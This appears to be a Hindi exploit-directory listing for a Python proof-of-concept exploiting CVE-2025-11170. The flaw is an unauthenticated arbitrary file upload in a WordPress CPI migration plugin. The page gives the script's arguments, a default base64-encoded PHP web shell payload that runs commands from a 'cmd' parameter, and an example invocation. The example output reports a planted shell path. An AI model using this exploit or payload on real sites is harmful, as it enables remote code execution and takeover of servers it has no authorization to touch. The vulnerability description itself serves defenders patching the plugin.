Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-11170 — WP प्रवासन प्लगइन for CPI <= 1.0.2 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-11170
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-11170

CVE-2025-11170

WP प्रवासन प्लगइन for CPI <= 1.0.2 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-11170

CPI के लिए WP माइग्रेशन विशेष प्लगइन <= 1.0.2 - बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड

🚀 CPI के लिए WP माइग्रेशन विशेष प्लगइन <= 1.0.2 - बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड

📝 विवरण

WordPress के लिए CPI के लिए WP माइग्रेशन विशेष प्लगइन प्लगइन, Cpiwm_Import_Controller::import फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण संस्करण 1.0.2 तक (और इसमें शामिल) मनमानी फ़ाइल अपलोड के लिए असुरक्षित है।
यह बिना प्रमाणीकरण वाले हमलावरों को प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जो संभावित रूप से दूरस्थ कोड निष्पादन को सक्षम कर सकता है।

🛡️ भेद्यता विवरण

  • CVE: CVE-2025-11170
  • CVSS स्कोर: 9.8 (गंभीर)
  • हमला वेक्टर: बिना प्रमाणीकरण के दूरस्थ फ़ाइल अपलोड

⚡ स्क्रिप्ट जानकारी

  • स्क्रिप्ट नाम: CVE-2025-11170.py
  • उद्देश्य: असुरक्षित WordPress CPI माइग्रेशन प्लगइन के लिए स्वचालित शेल/फ़ाइल अपलोडर एक्सप्लॉइट
  • 🔧 उपयोग

    तर्क

    तर्कविवरण
    -u, --urlआधार लक्ष्य URL (जैसे: http://target.com/wordpress/)। स्क्रिप्ट स्वचालित रूप से wp-admin/admin-ajax.php जोड़ता है।
    -f, --filenameअपलोड करने के लिए शेल या फ़ाइल का नाम। डिफ़ॉल्ट: shell.php
    -d, --dataबेस64 में फ़ाइल सामग्री (या कच्चा पाठ)। डिफ़ॉल्ट: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
    -i, --indexइंडेक्स फ़ील्ड मान। डिफ़ॉल्ट: 0
    -H, --headersअतिरिक्त HTTP हेडर (प्रारूप: X-Key:Value;K2:Value2)
    -t, --timeoutHTTP अनुरोध के लिए टाइमआउट (सेकंड)। डिफ़ॉल्ट: 10
    --retriesपुनः प्रयास प्रयासों की संख्या। डिफ़ॉल्ट: 3
    --backoffपुनः प्रयासों के बीच बैकऑफ़ गुणक (सेकंड)। डिफ़ॉल्ट: 0.7
    -v, --verboseडीबगिंग के लिए वर्बोज़िटी बढ़ाएँ (दोहराने योग्य)

    🚦 विधियों का स्पष्टीकरण

    • Nxploited_parse_args
      इनपुट तर्कों को पार्स और सत्यापित करता है। सही एंडपॉइंट संरचना, हेडर और डेटा एन्कोडिंग सुनिश्चित करता है।

    • Nxploited_logging
      उन्नत लॉगिंग और वर्बोज़िटी सेट करता है, विस्तृत या न्यूनतम रनटाइम आउटपुट के लिए।

    • Nxploited_retry_session
      लचीले संचार के लिए पुनः प्रयास और बैकऑफ़ तर्क के साथ एक स्थायी सत्र आरंभ करता है।

    • Nxploited_build_payload
      एक्सप्लॉइटेशन के लिए POST अनुरोध पैरामीटर बनाता है।

    • Nxploited_send
      असुरक्षित एंडपॉइंट पर वास्तविक POST अनुरोध करता है और प्रतिक्रियाओं/त्रुटियों का प्रबंधन करता है।

    • Nxploited_output_result
      प्रतिक्रिया को संसाधित और प्रारूपित करता है, सफलता पर शेल पथ प्रदर्शित करता है, अन्यथा डीबगिंग जानकारी।


    💡 उपयोग उदाहरण

    root@kitploit:~
    python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
    

    उदाहरण आउटपुट:

    root@kitploit:~
    Uploading shell...
    Processing response...
    [+] Upload successful!
    Shell path:
    http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
    Nxploited
    मेरा GitHub: https://github.com/Nxploited
    

    🚨 अस्वीकरण

    यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है।
    उचित प्राधिकरण के बिना लक्ष्यों पर इस एक्सप्लॉइट का उपयोग अवैध हो सकता है।
    लेखक किसी भी दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई जिम्मेदारी नहीं लेता है।


    📢 संपर्क करें

    GitHub: Nxploited
    Telegram: KNxploited


    द्वारा: Nxploited ( खालिद अलेनाज़ी )

    टूल डाउनलोड करें